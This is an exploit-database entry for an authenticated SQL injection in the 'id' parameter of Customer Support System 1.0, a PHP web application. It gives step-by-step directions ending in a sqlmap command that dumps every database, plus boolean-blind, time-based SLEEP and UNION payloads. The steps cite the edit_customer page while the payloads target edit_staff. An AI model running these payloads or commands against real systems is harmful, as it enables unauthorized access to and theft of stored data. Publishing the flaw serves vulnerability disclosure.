Share
## https://sploitus.com/exploit?id=PACKETSTORM:160578
# Exploit Title: Customer Support System 1.0 - 'id' SQL Injection  
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)  
# Date: 2020-12-11  
# Google Dork: N/A  
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code  
# Affected Version: Version 1  
# Patched Version: Unpatched  
# Category: Web Application  
# Tested on: Parrot OS  
  
Step 1. Login to the application with admin credentials  
  
Step 2. Click on Customer and select list.  
  
Step 3. On Customer list page, click on action and select edit. Capture the request made to "http://localhost/index.php?page=edit_customer&id=2" in burpsuite  
  
Step 4. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ".  
  
Step 5. This will inject successfully and you will have an information disclosure of all databases contents.  
  
---  
Parameter: id (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: page=edit_staff&id=1 AND 4164=4164  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: page=edit_staff&id=1 AND (SELECT 9430 FROM (SELECT(SLEEP(5)))HIyV)  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 10 columns  
Payload: page=edit_staff&id=-8018 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a716a71,0x497a58666d50656449704b4d76784f43577748416175666f44685869774177416f454c546458536d,0x717a7a6a71),NULL,NULL,NULL,NULL,NULL-- -  
---